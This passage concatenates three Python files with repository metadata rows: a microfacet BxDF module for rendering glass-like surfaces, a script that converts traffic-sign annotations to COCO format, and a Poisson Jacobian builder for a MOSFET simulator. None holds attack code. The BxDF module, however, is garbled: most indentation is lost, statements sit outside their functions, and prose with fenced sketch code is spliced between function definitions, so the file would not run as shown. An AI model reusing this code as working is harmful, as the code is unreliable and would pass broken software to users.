reflect_value = np.where(correct_reflect[nax], makeRtColorRGB( rGain * F * D * G / ( 4.0 * ABS( VdotN ) * ABS( LdotN )) ), makeRtColorRGB(0.0)) # baking LdotN
    reflect_fpdf = np.where(correct_reflect, chooseReflect * D * costheta * jacobian, 0)
    reflect_rpdf = np.where(correct_reflect, chooseReflect * D * costheta * jacobian, 0)
value = np.where(doRefraction[nax], refract_value, reflect_value)
fpdf = np.where(doRefraction, refract_fpdf, reflect_fpdf)
rpdf = np.where(doRefraction, refract_rpdf, reflect_rpdf)
return (wo, value, fpdf, rpdf)
def evaluate_reflect(roughness, eta, wo, wi, dist):
    # Returns the reflection BRDF value (cosine factor not included; the
    # Fresnel factor IS included unless eta == 0) and PDFs that carry no
    # Fresnel-based lobe-selection weight.
    """Evaluate reflection-only BRDF and PDFs for the Walter BxDF."""
# eta is assumed > 1, and it is the refractive index of the side of the
# surface facing away from the normal.
# Convention is for forward path tracing; "i" is the viewer and "o" is the light.
VdotN = wi[...,2]
LdotN = wo[...,2]
# Half vector.
H = SIGN(VdotN)[nax] * (wo + wi)
H = Normalize( H )
# check side for H
    correct = (H[...,2] * wi[...,2] * wi[...,2] > 0) & (LdotN * VdotN > 0.0)
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
    if eta == 0:
        F = 1
    else:
        eta_i = np.where(VdotN > 0, 1.0, eta)
        eta_o = np.where(VdotN > 0, eta, 1.0)
        F = fresnel(eta_i, eta_o, absVdotH)
roughness2 = roughness*roughness
HdotN = H[...,2]
costheta = ABS( HdotN )
costheta2 = costheta * costheta
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
alpha2_tantheta2 = roughness2 + ( 1.0 - costheta2 ) / costheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0 / ( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
tantheta2 = ( 1.0 - costheta2 ) / costheta2
        D = chi_plus(HdotN)/(np.pi * roughness2 * costheta2 * costheta2) * np.exp(-tantheta2/roughness2)
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a<1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a<1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Reflection case
jacobian = 1.0 / ( 4.0 * absLdotH ) # LdotH = VdotH by definition
value = np.where(correct[nax], makeRtColorRGB( F * D * G / ( 4.0 * ABS( VdotN ) * ABS( LdotN )) ), makeRtColorRGB(0.0)) # no baking LdotN
# value = np.where(correct[nax], makeRtColorRGB( F), makeRtColorRGB(0.0)) # no baking LdotN
fpdf = np.where(correct, chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) *D*costheta * jacobian, 0)
rpdf = np.where(correct, chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) *D*costheta * jacobian, 0)
return (value, fpdf, rpdf)
def evaluate_refract(roughness, eta, wo, wi, dist):
    # Returns the refraction BTDF value (cosine factor not included; the
    # (1 - Fresnel) factor IS included) and PDFs that carry no
    # Fresnel-based lobe-selection weight.
    """Evaluate refraction-only BTDF and PDFs for the Walter BxDF."""
tAlbedo = np.array((1.0, 1.0, 1.0))
# eta is assumed > 1, and it is the refractive index of the side of the
# surface facing away from the normal.
# Convention is for forward path tracing; "i" is the viewer and "o" is the light.
VdotN = wi[...,2]
LdotN = wo[...,2]
# Refractive indices for the two sides. eta_o is the index for the side
# opposite wi, even when wo is on the same side.
eta_i = np.where(VdotN > 0, 1.0, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
# Half vector.
H = -(eta_o[nax] * wo + eta_i[nax] * wi)
H = Normalize( H )
# check side
# correct = (H[...,2] * wi[...,2] > 0.0) & (LdotN*VdotN <0.0)
    correct = LdotN * VdotN < 0.0
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
F = fresnel(eta_i, eta_o, absVdotH)
roughness2 = roughness*roughness
HdotN = H[...,2]
costheta = ABS( HdotN )
costheta2 = costheta * costheta
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
alpha2_tantheta2 = roughness2 + ( 1.0 - costheta2 ) / costheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0 / ( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
tantheta2 = ( 1.0 - costheta2 ) / costheta2
D = chi_plus(HdotN)/(np.pi * roughness2 * costheta2 * costheta2) * np.exp(-tantheta2/roughness2)
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a<1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a<1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Refraction case
denom = ( VdotH + (eta_o/eta_i) * LdotH)**2
idenom = 1.0 / denom
fJacobian = absLdotH * idenom
rJacobian = absVdotH * idenom
value = np.where(correct[nax], tAlbedo * ( (1-F) * D * G * absVdotH * fJacobian * (eta_o/eta_i)**2 / ( ABS( VdotN) * ABS( LdotN )))[nax], makeRtColorRGB(0.0)) # not baking LdotN
fpdf = np.where(correct, chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * D*costheta * fJacobian * (eta_o/eta_i)**2, 0)
rpdf = np.where(correct, chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * D*costheta * rJacobian, 0)
return (value, fpdf, rpdf)
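The half vector used above follows the Walter convention H = -normalize(eta_o*wo + eta_i*wi). As a sanity check, for a perfectly smooth interface the half vector recovered from a Snell-refracted pair collapses back to the macroscopic normal. A minimal plain-Python sketch (the helper names `refract` and `half_vector_refract` are illustrative, not part of this module):

```python
import math

def refract(wi, n, eta_ratio):
    # Snell-refract the unit direction wi (pointing away from the surface)
    # about the unit normal n; eta_ratio = eta_i / eta_o.
    # Returns None on total internal reflection.
    cos_i = sum(a*b for a, b in zip(wi, n))
    sin2_t = eta_ratio*eta_ratio * (1.0 - cos_i*cos_i)
    if sin2_t > 1.0:
        return None
    cos_t = math.sqrt(1.0 - sin2_t)
    return tuple(eta_ratio*(-wi[k]) + (eta_ratio*cos_i - cos_t)*n[k] for k in range(3))

def half_vector_refract(wi, wo, eta_i, eta_o):
    # ht = -(eta_o*wo + eta_i*wi), normalized.
    h = tuple(-(eta_o*wo[k] + eta_i*wi[k]) for k in range(3))
    norm = math.sqrt(sum(c*c for c in h))
    return tuple(c/norm for c in h)

wi = (0.5, 0.0, math.sqrt(3.0)/2.0)         # 30 degrees off the normal, air side
wo = refract(wi, (0.0, 0.0, 1.0), 1.0/1.5)  # transmitted into glass (eta = 1.5)
h = half_vector_refract(wi, wo, 1.0, 1.5)
# h recovers the macroscopic normal (0, 0, 1), up to floating point.
```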
def sample_reflect(xi0, xi1, roughness, eta, wi, dist):
"""Generate a sample from the Walter BxDF by sampling the normal distribution."""
# TODO: implement sampling according to the visible normal distribution.
roughness2 = roughness * roughness
(H, costheta) = sampleH(roughness2, xi0, xi1, dist)
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
VdotN = wi[...,2]
wo = ReflectedVector( wi, H, VdotH )
HdotN = H[...,2]
LdotN = wo[...,2]
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
if eta==0:
F=1
else:
eta_i = np.where(VdotN > 0, 1, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
F = fresnel(eta_i, eta_o, absVdotH)
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
tantheta2 = roughness2 * xi0 / ( 1.0 - xi0 )
costheta2 = 1.0 / ( 1.0 + tantheta2 )
alpha2_tantheta2 = roughness2 + tantheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0/( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
costh = ABS(HdotN)
costh2 = costh**2
tanth2 = ( 1.0 - costh2 ) / costh2
D = chi_plus(HdotN)/(np.pi * roughness2 * costh2 * costh2) * np.exp(-tanth2/roughness2)
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a<1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a<1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Reflection case
jacobian = 1.0 / ( 4.0 * absLdotH ) # LdotH = VdotH by definition
# side check
correct_reflect = wi[...,2] * wo[...,2] >0
value = np.where(correct_reflect[nax], makeRtColorRGB( F * D * G / ( 4.0 * ABS( VdotN ) * ABS( LdotN )) ), makeRtColorRGB(0.0)) # baking LdotN
fpdf = np.where(correct_reflect, D * costheta * jacobian, 0)
rpdf = np.where(correct_reflect, D * costheta * jacobian, 0)
return (wo, value, fpdf, rpdf)
def sample_refract(xi0, xi1, roughness, eta, wi, dist):
"""Generate a sample from the Walter BxDF by sampling the normal distribution."""
# TODO: implement sampling according to the visible normal distribution.
tAlbedo = np.array((1.0, 1.0, 1.0))
roughness2 = roughness * roughness
(H, costheta) = sampleH(roughness2, xi0, xi1, dist)
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
VdotN = wi[...,2]
eta_i = np.where(VdotN > 0, 1.0, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
if VdotN[0] > 0: # assumes every sample in the batch lies on the same side of the surface
e = eta
else:
e = 1/eta
wo = RefractedVector( wi, H, VdotH, VdotN, e )
HdotN = H[...,2]
LdotN = wo[...,2]
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
F = fresnel(eta_i, eta_o, absVdotH)
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
tantheta2 = roughness2 * xi0 / ( 1.0 - xi0 )
costheta2 = 1.0 / ( 1.0 + tantheta2 )
alpha2_tantheta2 = roughness2 + tantheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0/( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
costh = ABS(HdotN)
costh2 = costh**2
tanth2 = ( 1.0 - costh2 ) / costh2
D = chi_plus(HdotN)/(np.pi * roughness2 * costh2 * costh2) * np.exp(-tanth2/roughness2)
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a < 1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a < 1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Refraction case
denom = (VdotH + eta_o/eta_i * LdotH)**2
idenom = 1.0 / denom
fJacobian = absLdotH * idenom
rJacobian = absVdotH * idenom
# side check
correct_refract = wi[...,2] * wo[...,2] <0
value = np.where(correct_refract[nax], tAlbedo * ( (1-F) * D * G * absVdotH * fJacobian * (eta_o/eta_i)**2 / (ABS( VdotN ) *ABS( LdotN )))[nax], makeRtColorRGB(0.0)) # not baking LdotN
fpdf = np.where(correct_refract, D * costheta * fJacobian * (eta_o/eta_i)**2, 0)
rpdf = np.where(correct_refract, D * costheta * rJacobian, 0)
return (wo, value, fpdf, rpdf)
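Both samplers rely on `sampleH` (defined elsewhere); for GGX the `tantheta2 = roughness2 * xi0 / (1.0 - xi0)` lines above are exactly the inverse-CDF inversion theta_h = arctan(alpha*sqrt(xi0/(1-xi0))). A standalone sketch of that sampling step (the function name is illustrative):

```python
import math

def sample_ggx_half_vector(xi0, xi1, alpha):
    # Inverse-CDF sampling of the GGX normal distribution:
    # theta_h = arctan(alpha * sqrt(xi0 / (1 - xi0))), phi uniform in [0, 2*pi).
    tantheta2 = alpha*alpha * xi0 / (1.0 - xi0)
    costheta = 1.0 / math.sqrt(1.0 + tantheta2)
    sintheta = math.sqrt(max(0.0, 1.0 - costheta*costheta))
    phi = 2.0 * math.pi * xi1
    # Unit half vector in the local frame with the normal along +z.
    return (sintheta*math.cos(phi), sintheta*math.sin(phi), costheta)

h = sample_ggx_half_vector(0.5, 0.25, 0.3)
```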
| 36.789799 | 198 | 0.599672 | 3,297 | 23,803 | 4.270852 | 0.074613 | 0.017044 | 0.004261 | 0.016902 | 0.880051 | 0.863007 | 0.841844 | 0.821106 | 0.807329 | 0.78787 | 0 | 0.049035 | 0.266605 | 23,803 | 646 | 199 | 36.846749 | 0.757576 | 0.180103 | 0 | 0.730673 | 0 | 0 | 0.009113 | 0 | 0 | 0 | 0 | 0.001548 | 0 | 1 | 0.062344 | false | 0 | 0.002494 | 0.037406 | 0.114713 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6b58865a1f9873f4cc110a355da33dfd888b824c | 4,855 | py | Python | tools/convert_datasets/txt2coco.py | LiangSiyuan21/Parallel-Rectangle-Flip-Attack-A-Query-based-Black-box-Attack-against-Object-Detection | 3bff39e35053c98eaa4c0b768f1f770f072bd4a2 | [
"Apache-2.0"
] | 13 | 2021-08-28T05:13:18.000Z | 2022-03-26T10:29:54.000Z | tools/convert_datasets/txt2coco.py | SCLBD/Parallel-Rectangle-Flip-Attack-A-Query-based-Black-box-Attack-against-Object-Detection | 3bff39e35053c98eaa4c0b768f1f770f072bd4a2 | [
"Apache-2.0"
] | null | null | null | tools/convert_datasets/txt2coco.py | SCLBD/Parallel-Rectangle-Flip-Attack-A-Query-based-Black-box-Attack-against-Object-Detection | 3bff39e35053c98eaa4c0b768f1f770f072bd4a2 | [
"Apache-2.0"
] | 1 | 2021-09-22T13:49:34.000Z | 2021-09-22T13:49:34.000Z | import json
import os
import cv2
import random
dataset = {'categories': [], 'images': [], 'annotations': []}
# Root path; it contains images/ (the image folder), annos.txt (bbox annotations),
# classes.txt (class labels), and an annotations/ folder (created automatically if
# missing, used to store the final json).
root_path = '/srv/hdd/data/CCTSDB_top1000/'
# Which split to build; can be switched to val.
phase = 'instances_train2017'
# Index at which the data is split into training and validation sets; adjustable.
split = 800
class_path = os.path.join(root_path, 'classes.txt')
print(class_path)
# Read the class labels.
with open(class_path) as f:
classes = f.read().strip().split(',')
# Map each class label to a numeric id.
for i, cls in enumerate(classes, 0):
dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'mark'})
# Read the image names from the images folder and shuffle them randomly.
file_path = os.path.join(root_path, 'images/')
file_list = list(os.listdir(file_path))
random.shuffle(file_list)
_names = [f for f in file_list]
# Split the file names into training and validation sets.
names_train = [line for i, line in enumerate(_names) if i < split]
names_val = [line for i, line in enumerate(_names) if i >= split]
# if phase == 'instances_train2017':
# names = [line for i, line in enumerate(_names) if i <= split]
# elif phase == 'instances_val2017':
# names = [line for i, line in enumerate(_names) if i > split]
# Read the bbox annotations.
with open(os.path.join(root_path, 'annos.txt')) as tr:
annos = tr.readlines()
# Convert the data above into the COCO-format train set.
for k, name in enumerate(names_train,0):
# Read the image with OpenCV to get its width and height.
im = cv2.imread(os.path.join(file_path,name))
height, width, _ = im.shape
# Add the image info to the dataset.
dataset['images'].append({'file_name': name,
'id': k,
'width': width,
'height': height})
index = name
# An image may contain several boxes, so scan every annotation line.
for ii, anno in enumerate(annos,1):
parts = anno.strip().split(';')
# type(parts[0]) is str
# If the annotation's file name matches this image, add the annotation.
if parts[0] == index:
# class id
cls_id = classes.index(parts[5])
# x_min
x1 = float(parts[1])
# y_min
y1 = float(parts[2])
x2 = float(parts[3])
y2 = float(parts[4])
w = x2 - x1
h = y2 - y1
dataset['annotations'].append({
'area': w * h,
'bbox': [x1, y1, w, h],
'category_id': int(cls_id),
'id': ii,
'image_id': k,
'iscrowd': 0,
# mask: the rectangle's four corners, clockwise from the top-left.
'segmentation': [[x1, y1, x2, y1, x2, y2, x1, y2]]
})
# Save the result.
folder = os.path.join(root_path, 'annotations')
if not os.path.exists(folder):
os.makedirs(folder)
json_name = os.path.join(folder, '{}.json'.format('instances_train2017'))
with open(json_name, 'w') as f:
json.dump(dataset, f)
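The corner-to-COCO conversion done inline above can be isolated into a small helper (the name `corners_to_coco` is illustrative): COCO stores boxes as [x_min, y_min, width, height] together with the area and a clockwise corner polygon, while annos.txt uses x1;y1;x2;y2 corners.

```python
def corners_to_coco(x1, y1, x2, y2):
    # Convert corner coordinates (x1, y1, x2, y2) into the COCO fields
    # used above: bbox = [x_min, y_min, w, h], area = w*h, and a
    # segmentation polygon running clockwise from the top-left corner.
    w, h = x2 - x1, y2 - y1
    return {'bbox': [x1, y1, w, h],
            'area': w * h,
            'segmentation': [[x1, y1, x2, y1, x2, y2, x1, y2]]}

a = corners_to_coco(10, 20, 30, 60)
# a['bbox'] is [10, 20, 20, 40] and a['area'] is 800.
```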
dataset = {'categories': [], 'images': [], 'annotations': []}
# Root path, same layout as above.
root_path = '/srv/hdd/data/CCTSDB_top1000/'
# Now build the validation set.
phase = 'instances_val2017'
# Train/val split boundary, same as above.
split = 800
class_path = os.path.join(root_path, 'classes.txt')
print(class_path)
# Read the class labels.
with open(class_path) as f:
classes = f.read().strip().split(',')
# Map each class label to a numeric id.
for i, cls in enumerate(classes, 0):
dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'mark'})
# Convert the data above into the COCO-format val set.
for k, name in enumerate(names_val,0):
# Read the image with OpenCV to get its width and height.
im = cv2.imread(os.path.join(file_path,name))
height, width, _ = im.shape
# Add the image info to the dataset.
dataset['images'].append({'file_name': name,
'id': k,
'width': width,
'height': height})
index = name
# An image may contain several boxes, so scan every annotation line.
for ii, anno in enumerate(annos,1):
parts = anno.strip().split(';')
# type(parts[0]) is str
# If the annotation's file name matches this image, add the annotation.
if parts[0] == index:
# class id
cls_id = classes.index(parts[5])
# x_min
x1 = float(parts[1])
# y_min
y1 = float(parts[2])
x2 = float(parts[3])
y2 = float(parts[4])
w = x2 - x1
h = y2 - y1
dataset['annotations'].append({
'area': w * h,
'bbox': [x1, y1, w, h],
'category_id': int(cls_id),
'id': ii,
'image_id': k,
'iscrowd': 0,
# mask: the rectangle's four corners, clockwise from the top-left.
'segmentation': [[x1, y1, x2, y1, x2, y2, x1, y2]]
})
# Save the result.
folder = os.path.join(root_path, 'annotations')
if not os.path.exists(folder):
os.makedirs(folder)
json_name = os.path.join(folder, '{}.json'.format('instances_val2017'))
with open(json_name, 'w') as f:
json.dump(dataset, f)
print('done') | 30.923567 | 100 | 0.560247 | 586 | 4,855 | 4.542662 | 0.21843 | 0.027047 | 0.037566 | 0.031555 | 0.864763 | 0.858002 | 0.831705 | 0.831705 | 0.831705 | 0.831705 | 0 | 0.029977 | 0.292276 | 4,855 | 157 | 101 | 30.923567 | 0.744761 | 0.183728 | 0 | 0.808081 | 0 | 0 | 0.129493 | 0.014785 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.040404 | 0 | 0.040404 | 0.030303 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6b59bd3bccbedee6088c4f33e31d50f443df31ba | 6,491 | py | Python | fprime.py | karnatyrohit/nanomos2.5_python | b072473d720c331226d472218c623f958a1f9f86 | [
"MIT"
] | null | null | null | fprime.py | karnatyrohit/nanomos2.5_python | b072473d720c331226d472218c623f958a1f9f86 | [
"MIT"
] | null | null | null | fprime.py | karnatyrohit/nanomos2.5_python | b072473d720c331226d472218c623f958a1f9f86 | [
"MIT"
] | null | null | null | ###########################################################################
####################A function to evaluate F_prime once####################
#########################September 2001 - Purdue###########################
###########################################################################
from readinput import *
def fprime(Nx, Ny, Ntotal, F_prime):
transport_model = transportmodel.value
fermi_flag = fermiflag1.value
Lsda = round(Lsd/dx)
Lg_topa = round(Lg_top/dx)
Lg_bota = round(Lg_bot/dx)
t_topa = round(t_top/dy)
t_bota = round(t_bot/dy)
t_sia = round(t_si/dy)
###########################################################################
####################Top gate insulator region##############################
###########################################################################
for i_node in np.arange(0, (Nx*(t_topa+1))):
if i_node >= 0 and i_node <= Lsda-1:
F_prime[i_node, i_node] = 1
F_prime[i_node, i_node+Nx] = -1
elif (i_node >= Lsda and i_node <= ((Lsda+Lg_topa))):
F_prime[i_node, i_node] = 1
elif (i_node >= ((Lsda+Lg_topa)+1) and i_node <= Nx-1):
F_prime[i_node, i_node] = 1
F_prime[i_node, i_node+Nx] = -1
elif(i_node >= (Nx*t_topa) and i_node <= (Nx*(t_topa+1) - 1)):
F_prime[i_node, i_node-Nx-1] = -eps_top/eps_si*dy/dx/8.0
F_prime[i_node, i_node-Nx] = -eps_top/eps_si*(dx/dy-dy/dx/4)
F_prime[i_node, i_node-Nx+1] = -eps_top/eps_si*dy/dx/8.0
F_prime[i_node, i_node-1] = -(eps_top/eps_si+1)*dy/dx*3.0/8.0
F_prime[i_node, i_node] = (eps_top/eps_si+1)*(dy/dx*3.0/4.0+dx/dy)
F_prime[i_node, i_node+1] = -(eps_top/eps_si+1)*dy/dx*3.0/8.0
F_prime[i_node, i_node+Nx-1] = -dy/dx/8.0
F_prime[i_node, i_node+Nx] = -(dx/dy-dy/dx/4.0)
F_prime[i_node, i_node+Nx+1] = -dy/dx/8.0
else:
F_prime[i_node, i_node-Nx] = -eps_top/eps_si*dx/dy
F_prime[i_node, i_node-1] = -eps_top/eps_si*dy/dx
F_prime[i_node, i_node] = 2.0*(dy/dx+dx/dy)*eps_top/eps_si
F_prime[i_node, i_node+1] = -eps_top/eps_si*dy/dx
F_prime[i_node, i_node+Nx] = -eps_top/eps_si*dx/dy
# Bottom gate insulator region
###########################
for i_node in np.arange((Ntotal-Nx*(t_bota+1)), Ntotal):
if(i_node >= (Ntotal-Nx*(t_bota+1)) and i_node <= (Ntotal-Nx*t_bota -1)):
F_prime[i_node, i_node-Nx-1] = -dy/dx/8.0
F_prime[i_node, i_node-Nx] = -(dx/dy-dy/dx/4.0)
F_prime[i_node, i_node-Nx+1] = -dy/dx/8.0
F_prime[i_node, i_node-1] = -(eps_bot/eps_si+1)*dy/dx*3.0/8.0
F_prime[i_node, i_node] = (eps_bot/eps_si+1)*(dy/dx*3.0/4.0+dx/dy)
F_prime[i_node, i_node+1] = -(eps_bot/eps_si+1)*dy/dx*3.0/8.0
F_prime[i_node, i_node+Nx-1] = -eps_bot/eps_si*dy/dx/8.0
F_prime[i_node, i_node+Nx] = -eps_bot/eps_si*(dx/dy-dy/dx/4.0)
F_prime[i_node, i_node+Nx+1] = -eps_bot/eps_si*dy/dx/8.0
elif(i_node >= (Ntotal-Nx) and i_node <= (Ntotal-Nx+Lsda -1)):
F_prime[i_node, i_node] = 1
F_prime[i_node, i_node-Nx] = -1
elif(i_node >= (Ntotal-Nx+Lsda) and i_node <= (Ntotal-Nx+Lsda+Lg_bota)):
F_prime[i_node, i_node] = 1
elif(i_node >= (Ntotal-Nx+1+Lsda+Lg_bota) and i_node <= Ntotal -1):
F_prime[i_node, i_node] = 1
F_prime[i_node, i_node-Nx] = -1
else:
F_prime[i_node, i_node-Nx] = -eps_bot/eps_si*dx/dy
F_prime[i_node, i_node-1] = -eps_bot/eps_si*dy/dx
F_prime[i_node, i_node] = 2.0*(dx/dy+dy/dx)*eps_bot/eps_si
F_prime[i_node, i_node+1] = -eps_bot/eps_si*dy/dx
F_prime[i_node, i_node+Nx] = -eps_bot/eps_si*dx/dy
# Specify the F_prime matrix in
# the silicon film region
###########################
for i_node in np.arange((Nx*(t_topa+1)), (Ntotal-Nx*(t_bota+1))):
F_prime[i_node, i_node-Nx] = -dx/dy
F_prime[i_node, i_node-1] = -dy/dx
F_prime[i_node, i_node] = 2.0*(dx/dy+dy/dx)
F_prime[i_node, i_node+1] = -dy/dx
F_prime[i_node, i_node+Nx] = -dx/dy
# Modify the F_prime matrix at
# the right and left boundaries
###########################
i_node_l = 0
i_node_r = Nx - 1
for iii in np.arange(0, Ny):
if iii == 0:
F_prime[i_node_l, :] = 0
F_prime[i_node_l, i_node_l] = 2
F_prime[i_node_l, i_node_l+1] = -1
F_prime[i_node_l, i_node_l+Nx] = -1
F_prime[i_node_r, :] = 0
F_prime[i_node_r, i_node_r] = 2
F_prime[i_node_r, i_node_r-1] = -1
F_prime[i_node_r, i_node_r+Nx] = -1
elif(iii > 0 and iii < round((Nx*(t_topa))/Nx)):
F_prime[i_node_l, :] = 0
F_prime[i_node_l, i_node_l] = 1
F_prime[i_node_l, i_node_l+1] = -1
F_prime[i_node_r, :] = 0
F_prime[i_node_r, i_node_r] = 1
F_prime[i_node_r, i_node_r-1] = -1
elif(iii >= round((Nx*(t_topa))/Nx) and iii <= round((Ntotal-Nx*t_bota)/Nx - 1)):
F_prime[i_node_l, :] = 0
F_prime[i_node_l, i_node_l] = 1
F_prime[i_node_l, i_node_l+1] = -1
F_prime[i_node_r, :] = 0
F_prime[i_node_r, i_node_r] = 1
F_prime[i_node_r, i_node_r-1] = -1
elif(iii > round((Ntotal-Nx*t_bota)/Nx - 1) and iii < Ny - 1):
F_prime[i_node_l, :] = 0
F_prime[i_node_l, i_node_l] = 1
F_prime[i_node_l, i_node_l+1] = -1
F_prime[i_node_r, :] = 0
F_prime[i_node_r, i_node_r] = 1
F_prime[i_node_r, i_node_r-1] = -1
elif iii == Ny-1 and ((Ntotal-Nx+1) < (Ntotal-Nx+1+Lsda)) and ((Ntotal-Nx+1+Lsda+Lg_bota) < Ntotal):
F_prime[i_node_l, :] = 0
F_prime[i_node_l, i_node_l] = 2
F_prime[i_node_l, i_node_l+1] = -1
F_prime[i_node_l, i_node_l-Nx] = -1
F_prime[i_node_r, :] = 0
F_prime[i_node_r, i_node_r] = 2
F_prime[i_node_r, i_node_r-1] = -1
F_prime[i_node_r, i_node_r-Nx] = -1
i_node_l = (1+iii)*Nx
i_node_r = (2+iii)*Nx - 1
#####################################################
# END OF SPECIFYING F_prime
